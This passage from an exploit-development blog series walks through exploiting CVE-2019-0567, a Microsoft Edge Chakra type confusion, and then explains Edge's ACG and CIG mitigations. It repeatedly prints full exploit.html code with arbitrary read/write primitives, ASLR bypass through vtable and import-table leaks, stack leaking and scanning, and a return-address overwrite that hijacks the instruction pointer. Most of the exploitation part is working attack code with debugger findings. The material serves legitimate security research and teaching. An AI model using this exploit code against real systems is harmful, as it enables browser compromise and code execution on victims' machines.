    dataview2.setUint32(0x0, valLo, true);       // 4-byte arbitrary write
    dataview2.setUint32(0x4, valHi, true);       // 4-byte arbitrary write
}

// Function used to set prototype on tmp function to cause type transition on o object
function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;
}

// main function
function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});
    }

    let o = {a: 1, b: 2};

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // dataview1 methods act on dataview2 object
    // Since vftable is located from 0x0 - 0x8 in dataview2, we can simply just retrieve it without going through our read64() function
    vtableLo = dataview1.getUint32(0x0, true);
    vtableHigh = dataview1.getUint32(0x4, true);

    // Extract dataview2->type (located 0x8 - 0x10) so we can follow the chain of pointers to leak a stack address via...
    // ... type->javascriptLibrary->scriptContext->threadContext
    typeLo = dataview1.getUint32(0x8, true);
    typeHigh = dataview1.getUint32(0xC, true);

    // Print update
    document.write("[+] DataView object 2 leaked vtable from chakra.dll: 0x" + hex(vtableHigh) + hex(vtableLo));
    document.write("<br>");

    // Store the base of chakra.dll
    chakraLo = vtableLo - 0x5d0bf8;
    chakraHigh = vtableHigh;

    // Print update
    document.write("[+] chakra.dll base address: 0x" + hex(chakraHigh) + hex(chakraLo));
    document.write("<br>");

    // Leak a pointer to kernelbase.dll (KERNELBASE!DuplicateHandle) from the IAT of chakra.dll
    // chakra+0x5ee2b8 points to KERNELBASE!DuplicateHandle
    kernelbaseLeak = read64(chakraLo+0x5ee2b8, chakraHigh);

    // KERNELBASE!DuplicateHandle is 0x18de0 away from kernelbase.dll's base address
    kernelbaseLo = kernelbaseLeak[0]-x18de0;
    kernelbaseHigh = kernelbaseLeak[1];

    // Store the pointer to KERNELBASE!DuplicateHandle (needed for our ACG bypass) into a more aptly named variable
    var duplicateHandle = new Uint32Array(0x4);
    duplicateHandle[0] = kernelbaseLeak[0];
    duplicateHandle[1] = kernelbaseLeak[1];

    // Print update
    document.write("[+] kernelbase.dll base address: 0x" + hex(kernelbaseHigh) + hex(kernelbaseLo));
    document.write("<br>");

    // ---------------------------------------------------------------------------------------------

    // Print update with our type pointer
    document.write("[+] type pointer: 0x" + hex(typeHigh) + hex(typeLo));
    document.write("<br>");

    // Spawn an alert dialogue to pause execution
    alert("DEBUG");
}
</script>

As we can see, we have added a document.write() call to print out the address of our type pointer (from which we will leak a stack address) and then we also added an alert() call to create an “alert” dialogue. Since JavaScript will use temporary virtual memory (e.g. memory that isn’t really backed by disk in the form of a 0x7fff address that is backed by a loaded DLL) for objects, this address is only “consistent” for the duration of the process. Think of this in terms of ASLR - when, on Windows, you reboot the system, you can expect images to be loaded at different addresses. This is synonymous with the longevity of the address/address space used for JavaScript objects, except that it is on a “per-script basis” and not a per-boot basis (“per-script” basis is a made-up word by myself to represent the fact the address of a JavaScript object will change after each time the JavaScript code is ran). This is the reason we have the document.write() call and alert() call. The document.write() call will give us the address of our type object, and the alert() dialogue will actually work, in essence, like a breakpoint in that it will pause execution of JavaScript, HTML, or CSS code until the “alert” dialogue has been dealt with. In other words, the JavaScript code cannot be fully executed until the dialogue is dealt with, meaning all of the JavaScript code is loaded into the content process and cannot be released until it is dealt with. This will allow us examine the type pointer before it goes out of scope, and so we can examine it. We will use this same “setup” (e.g. alert() calls) to our advantage in debugging in the future.

If we run our exploit two separate times, we can confirm our theory about the type pointer changing addresses each time the JavaScript executes

Now, for “real” this time, let’s open up exploit.html in Edge and click the Click me to exploit CVE-2019-0567 button. This should bring up our “alert” dialogue.

As we can see, the type pointer is located at 0x1ca40d69100 (note you won’t be able to use copy and paste with the dialogue available, so you will have to manually type this value). Now that we know the address of the type pointer, we can use Process Hacker to locate our content process.

As we can see, the content process which uses the most RAM is PID 6464. This is our content process, where our exploit is currently executing (although paused). We now can use WinDbg to attach to the process and examine the memory contents of 0x1ca40d69100.

After inspecting the memory contents, we can confirm that this is a valid address - meaning our type pointer hasn’t gone out of scope! Although a bit of an arduous process, this is how we can successfully debug Edge for our exploit development!

Using the Project Zero issue as a guide, and leveraging the process outlined in part two of this blog series, we can talk various pointers within this structure to fetch a stack address!

The Google Project Zero issue explains that we essentially can just walk the type pointer to extract a ScriptContext structure which, in turn, contains ThreadContext. The ThreadContext structure is responsible, as we have see, for storing various stack addresses. Here are the offsets:

  1. type + 0x8 = JavaScriptLibrary
  2. JavaScriptLibrary + 0x430 = ScriptContext
  3. ScriptContext + 0x5c0 = ThreadContext

In our case, the ThreadContext structure is located at 0x1ca3d72a000.

Previously, we leaked the stackLimitForCurrentThread member of ThreadContext, which gave us essentially the stack limit for the exploiting thread. However, take a look at this address within Edge (located at ThreadContext + 0x4f0)

If we try to examine the memory contents of this address, we can see they are not committed to memory. This obviously means this address doesn’t fall within the bounds of the TEB’s known stack address(es) for our current thread.

As we can recall from part two, this was also the case. However, in ChakraCore, we could compute the offset from the leaked stackLimitForCurrentThread consistently between exploit attempts. Let’s compute the distance from our leaked stackLimitForCurrentThread with the actual stack limit from the TEB.

Here, at this point in the exploit, the leaked stack address is 0x1cf0000 bytes away from the actual stack limit we leaked via the TEB. Let’s exit out of WinDbg and re-run our exploit, while also leaking our stack address within WinDbg.

Our type pointer is located at 0x157acb19100.

After attaching Edge to WinDbg and walking the type object, we can see our leaked stack address via stackLimitForCurrentThread.

As we can see above, when computing the offset, our offset has changed to being 0x1c90000 bytes away from the actual stack limit. This poses a problem for us, as we cannot reliable compute the offset to the stack limit. Since the stack limit saved in the ThreadContext structure (stackForCurrentThreadLimit) is not committed to memory, we will actually get an access violation when attempting to dereference this memory. This means our exploit would be killed, meaning we also can’t “guess” the offset if we want our exploit to be reliable.

Before I pose the solution, I wanted to touch on something I first tried. Within the ThreadContext structure, there is a global variable named globalListFirst. This seems to be a linked-list within a ThreadContext structure which is used to track other instances of a ThreadContext structure. At an offset of 0x10 within this list (consistently, I found, in every attempt I made) there is actually a pointer to the heap.

Since it is possible via stackLimitForCurrentThread to at least leak an address around the current stack limit (with the upper 32-bits being the same across all stack addresses), and although there is a degree of variance between the offset from stackLimitForCurrentThread and the actual current stack limit (around 0x1cX0000 bytes as we saw between our two stack leak attempts), I used my knowledge of the heap to do the following:

  1. Leak the heap from chakra!ThreadContext::globalListFirst
  2. Using the read primitive, scan the heap for any stack addresses that are greater than the leaked stack address from stackLimitForCurrentThread

I found that about 50-60% of the time I could reliably leak a stack address from the heap. From there, about 50% of the time the stack address that was leaked from the heap was committed to memory. However, there was a varying degree of “failing” - meaning I would often get an access violation on the leaked stack address from the heap. Although I was only succeeding in about half of the exploit attempts, this is significantly greater than trying to “guess” the offset from the stackLimitForCurrenThread. However, after I got frustrated with this, I saw there was a much easier approach.

The reason why I didn’t take this approach earlier, is because the stackLimitForCurrentThread seemed to be from a thread stack which was no longer in memory. This can be seen below.

Looking at the above image, we can see only one active thread has a stack address that is anywhere near stackLimitForCurrentThread. However, if we look at the TEB for the single thread, the stack address we are leaking doesn’t fall anywhere within that range. This was disheartening for me, as I assumed any stack address I leaked from this ThreadContext structure was from a thread which was no longer active and, thus, its stack address space being decommitted. However, in the Google Project Zero issue - stackLimitForCurrentThread wasn’t the item leaked, it was leafInterpreterFrame. Since I had enjoyed success with stackLimitForCurrentThread in part two of this blog series, it didn’t cross my mind until much later to investigate this specific member.

If we take a look at the ThreadContext structure, we can see that at offset 0x8f0 that there is a stack address.

In fact, we can see two stack addresses. Both of them are committed to memory, as well!

If we compare this to Ivan’s findings in the Project Zero issue, we can see that he leaks two stack addresses at offset 0x8a0 and 0x8a8, just like we have leaked them at 0x8f0 and 0x8f8. We can therefore infer that these are the same stack addresses from the leafInterpreter member of ThreadContext, and that we are likely on a different version of Windows that Ivan, which likely means a different version of Edge and, thus, the slight difference in offset. For our exploit, you can choose either of these addresses. I opted for ThreadContext + 0x8f8.

Additionally, if we look at the address itself (0x1c2affaf60), we can see that this address doesn’t reside within the current thread.

However, we can clearly see that not only is this thread committed to memory, it is within the known bounds of another thread’s TEB tracking of the stack (note that the below diagram is confusing because the columns are unaligned. We are outlining the stack base and limit).

This means we can reliably locate a stack address for a currently executing thread! It is perfectly okay if we end up hijacking a return address within another thread because as we have the ability to read/write anywhere within the process space, and because the level of “private” address space Windows uses is on a per-process basis, we can still hijack any thread from the current process. In essence, it is perfectly valid to corrupt a return address on another thread to gain code execution. The “lower level details” are abstracted away from us when it comes to this concept, because regardless of what return address we overwrite, or when the thread terminates, it will have to return control-flow somewhere in memory. Since threads are constantly executing functions, we know that at some point the thread we are dealing with will receive priority for execution and the return address will be executed. If this makes no sense, do not worry. Our concept hasn’t changed in terms of overwriting a return address (be it in the current thread or another thread). We are not changing anything, from a foundational perspective, in terms of our stack leak and return address corruption between this blog post and part two of this blog series.

With that being said, here is how our exploit now looks with our stack leak.

<button onclick="main()">Click me to exploit CVE-2019-0567!</button>

<script>
// CVE-2019-0567: Microsoft Edge Type Confusion
// Author: Connor McGarr (@33y0re)

// Creating object obj
// Properties are stored via auxSlots since properties weren't declared inline
obj = {}
obj.a = 1;
obj.b = 2;
obj.c = 3;
obj.d = 4;
obj.e = 5;
obj.f = 6;
obj.g = 7;
obj.h = 8;
obj.i = 9;
obj.j = 10;

// Create two DataView objects
dataview1 = new DataView(new ArrayBuffer(0x100));
dataview2 = new DataView(new ArrayBuffer(0x100));

// Function to convert to hex for memory addresses
function hex(x) {
    return x.toString(16);
}

// Arbitrary read function
function read64(lo, hi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to read from (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Instead of returning a 64-bit value here, we will create a 32-bit typed array and return the entire away
    // Write primitive requires breaking the 64-bit address up into 2 32-bit values so this allows us an easy way to do this
    var arrayRead = new Uint32Array(0x10);
    arrayRead[0] = dataview2.getInt32(0x0, true);   // 4-byte arbitrary read
    arrayRead[1] = dataview2.getInt32(0x4, true);   // 4-byte arbitrary read

    // Return the array
    return arrayRead;
}

// Arbitrary write function
function write64(lo, hi, valLo, valHi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to write to (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Perform the write with our 64-bit value (broken into two 4 bytes values, because of JavaScript)
    dataview2.setUint32(0x0, valLo, true);       // 4-byte arbitrary write
    dataview2.setUint32(0x4, valHi, true);       // 4-byte arbitrary write
}

// Function used to set prototype on tmp function to cause type transition on o object
function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;
}

// main function
function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});
    }

    let o = {a: 1, b: 2};

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // dataview1 methods act on dataview2 object
    // Since vftable is located from 0x0 - 0x8 in dataview2, we can simply just retrieve it without going through our read64() function
    vtableLo = dataview1.getUint32(0x0, true);
    vtableHigh = dataview1.getUint32(0x4, true);

    // Extract dataview2->type (located 0x8 - 0x10) so we can follow the chain of pointers to leak a stack address via...
    // ... type->javascriptLibrary->scriptContext->threadContext
    typeLo = dataview1.getUint32(0x8, true);
    typeHigh = dataview1.getUint32(0xC, true);

    // Print update
    document.write("[+] DataView object 2 leaked vtable from chakra.dll: 0x" + hex(vtableHigh) + hex(vtableLo));
    document.write("<br>");

    // Store the base of chakra.dll
    chakraLo = vtableLo - 0x5d0bf8;
    chakraHigh = vtableHigh;

    // Print update
    document.write("[+] chakra.dll base address: 0x" + hex(chakraHigh) + hex(chakraLo));
    document.write("<br>");

    // Leak a pointer to kernelbase.dll (KERNELBASE!DuplicateHandle) from the IAT of chakra.dll
    // chakra+0x5ee2b8 points to KERNELBASE!DuplicateHandle
    kernelbaseLeak = read64(chakraLo+0x5ee2b8, chakraHigh);

    // KERNELBASE!DuplicateHandle is 0x18de0 away from kernelbase.dll's base address
    kernelbaseLo = kernelbaseLeak[0]-0x18de0;
    kernelbaseHigh = kernelbaseLeak[1];

    // Store the pointer to KERNELBASE!DuplicateHandle (needed for our ACG bypass) into a more aptly named variable
    var duplicateHandle = new Uint32Array(0x4);
    duplicateHandle[0] = kernelbaseLeak[0];
    duplicateHandle[1] = kernelbaseLeak[1];

    // Print update
    document.write("[+] kernelbase.dll base address: 0x" + hex(kernelbaseHigh) + hex(kernelbaseLo));
    document.write("<br>");

    // Print update with our type pointer
    document.write("[+] type pointer: 0x" + hex(typeHigh) + hex(typeLo));
    document.write("<br>");

    // Arbitrary read to get the javascriptLibrary pointer (offset of 0x8 from type)
    javascriptLibrary = read64(typeLo+8, typeHigh);

    // Arbitrary read to get the scriptContext pointer (offset 0x450 from javascriptLibrary. Found this manually)
    scriptContext = read64(javascriptLibrary[0]+0x430, javascriptLibrary[1])

    // Arbitrary read to get the threadContext pointer (offset 0x3b8)
    threadContext = read64(scriptContext[0]+0x5c0, scriptContext[1]);

    // Leak a pointer to a pointer on the stack from threadContext at offset 0x8f0
    // https://bugs.chromium.org/p/project-zero/issues/detail?id=1360
    // Offsets are slightly different (0x8f0 and 0x8f8 to leak stack addresses)
    stackleakPointer = read64(threadContext[0]+0x8f8, threadContext[1]);

    // Print update
    document.write("[+] Leaked stack address! type->javascriptLibrary->scriptContext->threadContext->leafInterpreterFrame: 0x" + hex(stackleakPointer[1]) + hex(stackleakPointer[0]));
    document.write("<br>");
}
</script>

After running our exploit, we can see that we have successfully leaked a stack address.

From our experimenting earlier, the offsets between the leaked stack addresses have a certain degree of variance between script runs. Because of this, there is no way for us to compute the base and limit of the stack with our leaked address, as the offset is set to change. Because of this, we will forgo the process of computing the stack limit. Instead, we will perform our stack scanning for return addresses from the address we have currently leaked. Let’s recall a previous image outlining the stack limit of the thread where we leaked a stack address at the time of the leak.

As we can see, we are towards the base of the stack. Since the stack grows “downwards”, as we can see with the stack base being located at a higher address than the actual stack limit, we will do our scanning in “reverse” order, in comparison to part two. For our purposes, we will do stack scanning by starting at our leaked stack address and traversing backwards towards the stack limit (which is the highest, technically “lowest” address the stack can grow towards).

We already outlined in part two of this blog post the methodology I used in terms of leaking a return address to corrupt. As mentioned then, the process is as follows:

  1. Traverse the stack using read primitive
  2. Print out all contents of the stack that are possible to read
  3. Look for anything starting with 0x7fff, meaning an address from a loaded module like chakra.dll
  4. Disassemble the address to see if it is an actual return address

While omitting much of the code from our full exploit, a stack scan would look like this (a scan used just to print out return addresses):

(...)truncated(...)

// Leak a pointer to a pointer on the stack from threadContext at offset 0x8f0
// https://bugs.chromium.org/p/project-zero/issues/detail?id=1360
// Offsets are slightly different (0x8f0 and 0x8f8 to leak stack addresses)
stackleakPointer = read64(threadContext[0]+0x8f8, threadContext[1]);

// Print update
document.write("[+] Leaked stack address! type->javascriptLibrary->scriptContext->threadContext->leafInterpreterFrame: 0x" + hex(stackleakPointer[1]) + hex(stackleakPointer[0]));
document.write("<br>");

// Counter variable
let counter = 0x6000;

// Loop
while (counter != 0)
{
    // Store the contents of the stack
    tempContents = read64(stackleakPointer[0]+counter, stackleakPointer[1]);

    // Print update
    document.write("[+] Stack address 0x" + hex(stackleakPointer[1]) + hex(stackleakPointer[0]+counter) + " contains: 0x" + hex(tempContents[1]) + hex(tempContents[0]));
    document.write("<br>");

    // Decrement the counter
    // This is because the leaked stack address is near the stack base so we need to traverse backwards towards the stack limit
    counter -= 0x8;
}

As we can see above, we do this in “reverse” order of our ChakraCore exploit in part two. Since we don’t have the luxury of already knowing where the stack limit is, which is the “last” address that can be used by that thread’s stack, we can’t just traverse the stack by incrementing. Instead, since we are leaking an address towards the “base” of the stack, we have to decrement (since the stack grows downwards) towards the stack limit.

In other words, less technically, we have leaked somewhere towards the “bottom” of the stack and we want to walk towards the “top of the stack” in order to scan for return addresses. You’ll notice a few things about the previous code, the first being the arbitrary 0x6000 number. This number was found by trial and error. I started with 0x1000 and ran the loop to see if the exploit crashed. I kept incrementing the number until a crash started to ensue. A crash in this case refers to the fact we are likely reading from decommitted memory, meaning we will cause an access violation. The “gist” of this is to basically see how many bytes you can read without crashing, and those are the return addresses you can choose from. Here is how our output looks.

As we start to scroll down through the output, we can clearly see some return address starting to bubble up!

Since I already mentioned the “trial and error” approach in part two, which consists of overwriting a return address (after confirming it is one) and seeing if you end up controlling the instruction pointer by corrupting it, I won’t show this process here again. Just know, as mentioned, that this is just a matter of trial and error (in terms of my approach). The return address that I found worked best for me was chakra!Js::JavascriptFunction::CallFunction<1>+0x83 (again there is no “special” way to find it. I just started corrupting return address with 0x4141414141414141 and seeing if I caused an access violation with RIP being controlled to by the value 0x4141414141414141, or RSP being pointed to by this value at the time of the access violation).

This value can be seen in the stack leaking contents.

Why did I choose this return address? Again, it was an arduous process taking every stack address and overwriting it until one consistently worked. Additionally, a little less anecdotally, the symbol for this return address is with a function quite literally called CallFunction, which means its likely responsible for executing a function call of interpreted JavaScript. Because of this, we know a function will execute its code and then hand execution back to the caller via the return address. It is likely that this piece of code will be executed (the return address) since it is responsible for calling a function. However, there are many other options that you could choose from.

<button onclick="main()">Click me to exploit CVE-2019-0567!</button>

<script>
// CVE-2019-0567: Microsoft Edge Type Confusion
// Author: Connor McGarr (@33y0re)

// Creating object obj
// Properties are stored via auxSlots since properties weren't declared inline
obj = {}
obj.a = 1;
obj.b = 2;
obj.c = 3;
obj.d = 4;
obj.e = 5;
obj.f = 6;
obj.g = 7;
obj.h = 8;
obj.i = 9;
obj.j = 10;

// Create two DataView objects
dataview1 = new DataView(new ArrayBuffer(0x100));
dataview2 = new DataView(new ArrayBuffer(0x100));

// Function to convert to hex for memory addresses
function hex(x) {
    return x.toString(16);
}

// Arbitrary read function
function read64(lo, hi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to read from (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Instead of returning a 64-bit value here, we will create a 32-bit typed array and return the entire away
    // Write primitive requires breaking the 64-bit address up into 2 32-bit values so this allows us an easy way to do this
    var arrayRead = new Uint32Array(0x10);
    arrayRead[0] = dataview2.getInt32(0x0, true);   // 4-byte arbitrary read
    arrayRead[1] = dataview2.getInt32(0x4, true);   // 4-byte arbitrary read

    // Return the array
    return arrayRead;
}

// Arbitrary write function
function write64(lo, hi, valLo, valHi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to write to (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Perform the write with our 64-bit value (broken into two 4 bytes values, because of JavaScript)
    dataview2.setUint32(0x0, valLo, true);       // 4-byte arbitrary write
    dataview2.setUint32(0x4, valHi, true);       // 4-byte arbitrary write
}

// Function used to set prototype on tmp function to cause type transition on o object
function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;
}

// main function
function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});
    }

    let o = {a: 1, b: 2};

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // dataview1 methods act on dataview2 object
    // Since vftable is located from 0x0 - 0x8 in dataview2, we can simply just retrieve it without going through our read64() function
    vtableLo = dataview1.getUint32(0x0, true);
    vtableHigh = dataview1.getUint32(0x4, true);

    // Extract dataview2->type (located 0x8 - 0x10) so we can follow the chain of pointers to leak a stack address via...
    // ... type->javascriptLibrary->scriptContext->threadContext
    typeLo = dataview1.getUint32(0x8, true);
    typeHigh = dataview1.getUint32(0xC, true);

    // Print update
    document.write("[+] DataView object 2 leaked vtable from chakra.dll: 0x" + hex(vtableHigh) + hex(vtableLo));
    document.write("<br>");

    // Store the base of chakra.dll
    chakraLo = vtableLo - 0x5d0bf8;
    chakraHigh = vtableHigh;

    // Print update
    document.write("[+] chakra.dll base address: 0x" + hex(chakraHigh) + hex(chakraLo));
    document.write("<br>");

    // Leak a pointer to kernelbase.dll (KERNELBASE!DuplicateHandle) from the IAT of chakra.dll
    // chakra+0x5ee2b8 points to KERNELBASE!DuplicateHandle
    kernelbaseLeak = read64(chakraLo+0x5ee2b8, chakraHigh);

    // KERNELBASE!DuplicateHandle is 0x18de0 away from kernelbase.dll's base address
    kernelbaseLo = kernelbaseLeak[0]-0x18de0;
    kernelbaseHigh = kernelbaseLeak[1];

    // Store the pointer to KERNELBASE!DuplicateHandle (needed for our ACG bypass) into a more aptly named variable
    var duplicateHandle = new Uint32Array(0x4);
    duplicateHandle[0] = kernelbaseLeak[0];
    duplicateHandle[1] = kernelbaseLeak[1];

    // Print update
    document.write("[+] kernelbase.dll base address: 0x" + hex(kernelbaseHigh) + hex(kernelbaseLo));
    document.write("<br>");

    // Print update with our type pointer
    document.write("[+] type pointer: 0x" + hex(typeHigh) + hex(typeLo));
    document.write("<br>");

    // Arbitrary read to get the javascriptLibrary pointer (offset of 0x8 from type)
    javascriptLibrary = read64(typeLo+8, typeHigh);

    // Arbitrary read to get the scriptContext pointer (offset 0x450 from javascriptLibrary. Found this manually)
    scriptContext = read64(javascriptLibrary[0]+0x430, javascriptLibrary[1])

    // Arbitrary read to get the threadContext pointer (offset 0x3b8)
    threadContext = read64(scriptContext[0]+0x5c0, scriptContext[1]);

    // Leak a pointer to a pointer on the stack from threadContext at offset 0x8f0
    // https://bugs.chromium.org/p/project-zero/issues/detail?id=1360
    // Offsets are slightly different (0x8f0 and 0x8f8 to leak stack addresses)
    stackleakPointer = read64(threadContext[0]+0x8f8, threadContext[1]);

    // Print update
    document.write("[+] Leaked stack address! type->javascriptLibrary->scriptContext->threadContext->leafInterpreterFrame: 0x" + hex(stackleakPointer[1]) + hex(stackleakPointer[0]));
    document.write("<br>");

    // We can reliably traverse the stack 0x6000 bytes
    // Scan the stack for the return address below
    /*
    0:020> u chakra+0xd4a73
    chakra!Js::JavascriptFunction::CallFunction<1>+0x83:
    00007fff`3a454a73 488b5c2478      mov     rbx,qword ptr [rsp+78h]
    00007fff`3a454a78 4883c440        add     rsp,40h
    00007fff`3a454a7c 5f              pop     rdi
    00007fff`3a454a7d 5e              pop     rsi
    00007fff`3a454a7e 5d              pop     rbp
    00007fff`3a454a7f c3              ret
    */

    // Creating an array to store the return address because read64() returns an array of 2 32-bit values
    var returnAddress = new Uint32Array(0x4);
    returnAddress[0] = chakraLo + 0xd4a73;
    returnAddress[1] = chakraHigh;

	// Counter variable
	let counter = 0x6000;

	// Loop
	while (counter != 0)
	{
	    // Store the contents of the stack
	    tempContents = read64(stackleakPointer[0]+counter, stackleakPointer[1]);

	    // Did we find our target return address?
        if ((tempContents[0] == returnAddress[0]) && (tempContents[1] == returnAddress[1]))
        {
			document.write("[+] Found our return address on the stack!");
            document.write("<br>");
            document.write("[+] Target stack address: 0x" + hex(stackleakPointer[1]) + hex(stackleakPointer[0]+counter));
            document.write("<br>");

            // Break the loop
            break;

        }
        else
        {
        	// Decrement the counter
	    	// This is because the leaked stack address is near the stack base so we need to traverse backwards towards the stack limit
	    	counter -= 0x8;
        }
	}

	// Corrupt the return address to control RIP with 0x4141414141414141
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);
}
</script>

Open the updated exploit.html script and attach WinDbg before pressing the Click me to exploit CVE-2019-0567! button.

After attaching to WinDbg and pressing g, go ahead and click the button (may require clicking twice in some instance to detonate the exploit). Please note that sometimes there is a slight edge case where the return address isn’t located on the stack. So if the debugger shows you crashing on the GetValue method, this is likely a case of that. After testing, 10/10 times I found the return address. However, it is possible once in a while to not encounter it. It is very rare.

After running exploit.html in the debugger, we can clearly see that we have overwritten a return address on the stack with 0x4141414141414141 and Edge is attempting to return into it. We have, again, successfully corrupted control-flow and can now redirect execution wherever we want in Edge. We went over all of this, as well, in part two of this blog series!

Now that we have our read/write primitive and control-flow hijacking ported to Edge, we can now begin our Edge-specific exploitation which involves many ROP chains to bypass Edge mitigations like Arbitrary Code Guard.

Arbitrary Code Guard && Code Integrity Guard

We are now at a point where our exploit has the ability to read/write memory, we control the instruction pointer, and we know where the stack is. With these primitives, exploitation should be as follows (in terms of where exploit development currently and traditionally is at):

  1. Bypass ASLR to determine memory layout (done)
  2. Achieve read/write primitive (done)
  3. Locate the stack (done)
  4. Control the instruction pointer (done)
  5. Write a ROP payload to the stack (TBD)
  6. Write shellcode to the stack (or somewhere else in memory) (TBD)
  7. Mark the stack (or regions where shellcode is) as RWX (TBD)
  8. Execute shellcode (TBD)

Steps 5 through 8 are required as a result of DEP. DEP, a mitigation which has been beaten to death, separates code and data segments of memory. The stack, being a data segment of memory (it is only there to hold data), is not executable whenever DEP is enabled. Because of this, we invoke a function like VirtualProtect (via ROP) to mark the region of memory we wrote our shellcode to (which is a data segment that allows data to be written to it) as RWX. I have documented this procedure time and time again. We leak an address (or abuse non-ASLR modules, which is very rare now), we use our primitive to write to the stack (stack-based buffer overflow in the two previous links provided), we mark the stack as RWX via ROP (the shellcode is also on the stack) and we are now allowed to execute our shellcode since its in a RWX region of memory. With that said, let me introduce a new mitigation into the fold - Arbitrary Code Guard (ACG).

ACG is a mitigation which prohibits any dynamically-generated RWX memory. This is manifested in a few ways, pointed out by Matt Miller in his blog post on ACG. As Matt points out:

“With ACG enabled, the Windows kernel prevents a content process from creating and modifying code pages in memory by enforcing the following policy:

  1. Code pages are immutable. Existing code pages cannot be made writable and therefore always have their intended content. This is enforced with additional checks in the memory manager that prevent code pages from becoming writable or otherwise being modified by the process itself. For example, it is no longer possible to use VirtualProtect to make an image code page become PAGE_EXECUTE_READWRITE.

  2. New, unsigned code pages cannot be created. For example, it is no longer possible to use VirtualAlloc to create a new PAGE_EXECUTE_READWRITE code page.”

What this means is that an attacker can write their shellcode to a data portion of memory (like the stack) all they want, gladly. However, the permissions needed (e.g. the memory must be explicitly marked executable by the adversary) can never be achieved with ACG enabled. At a high level, no memory permissions in Edge (specifically content processes, where our exploit lives) can be modified (we can’t write our shellcode to a code page nor can we modify a data page to execute our shellcode).

Now, you may be thinking - “Connor, instead of executing native shellcode in this manner, why don’t you just use WinExec like in your previous exploit from part two of this blog series to spawn cmd.exe or some other application to download some staged DLL and just load it into the process space?” This is a perfectly valid thought - and, thus, has already been addressed by Microsoft.

Edge has another small mitigation known as “no child processes”. This nukes any ability to spawn a child process to go inject some shellcode into another process, or load a DLL. Not only that, even if there was no mitigation for child processes, there is a “sister” mitigation to ACG called Code Integrity Guard (CIG) which also is present in Edge.

CIG essentially says that only Microsoft-signed DLLs can be loaded into the process space. So, even if we could reach out to a retrieve a staged DLL and get it onto the system, it isn’t possible for us to load it into the content process, as the DLL isn’t a signed DLL (inferring the DLL is a malicious one, it wouldn’t be signed).

So, to summarize, in Edge we cannot:

  1. Use VirtualProtect to mark the stack where our shellcode is to RWX in order to execute it
  2. We can’t use VirtualProtect to make a code page (RX memory) to writable in order to write our shellcode to this region of memory (using something like a WriteProcessMemory ROP chain)
  3. We cannot allocate RWX memory within the current process space using VirtualAlloc
  4. We cannot allocate RW memory with VirtualAlloc and then mark it as RX
  5. We cannot allocate RX memory with VirtualAlloc and then mark it as RW

With the advent of all three of these mitigations, previous exploitation strategies are all thrown out of the window. Let’s talk about how this changes our exploit strategy, now knowing we cannot just execute shellcode directly within the content process.

CVE-2017-8637 - Combining Vulnerabilities

As we hinted at, and briefly touched on earlier in this blog post, we know that something has to be done about JIT code with ACG enablement. This is because, by default, JIT code is generated as RWX. If we think about it, JIT’d code first starts out as an “empty” allocation (just like when we allocate some memory with VirtualAlloc). This memory is first marked as RW (it is writable because Chakra needs to actually write the code into it that will be executed into the allocation). We know that since there is no execute permission on this RW allocation, and this allocation has code that needs to be executed, the JIT engine has to change the region of memory to RX after its generated. This means the JIT engine has to generate dynamic code that has its memory permissions changed. Because of this, no JIT code can really be generated in an Edge process with ACG enabled. As pointed out in Matt’s blog post (and briefly mentioned by us) this architectural issue was addresses as follows:

“Modern web browsers achieve great performance by transforming JavaScript and other higher-level languages into native code. As a result, they inherently rely on the ability to generate some amount of unsigned native code in a content process. Enabling JIT compilers to work with ACG enabled is a non-trivial engineering task, but it is an investment that we’ve made for Microsoft Edge in the Windows 10 Creators Update. To support this, we moved the JIT functionality of Chakra into a separate process that runs in its own isolated sandbox. The JIT process is responsible for compiling JavaScript to native code and mapping it into the requesting content process. In this way, the content process itself is never allowed to directly map or modify its own JIT code pages.”

As we have already seen in this blog post, two processes are generated (JIT server and content process) and the JIT server is responsible for taking the JavaScript code from the content process and transforming it into machine code. This machine code is then mapped back into the content process with appropriate permissions (like that of the .text section, RX). The vulnerability (CVE-2017-8637) mentioned in this section of the blog post took advantage of a flaw in this architecture to compromise Edge fully and, thus, bypass ACG. Let’s talk about a bit about the architecture of the JIT server and content process communication channel first (please note that this vulnerability has been patched).

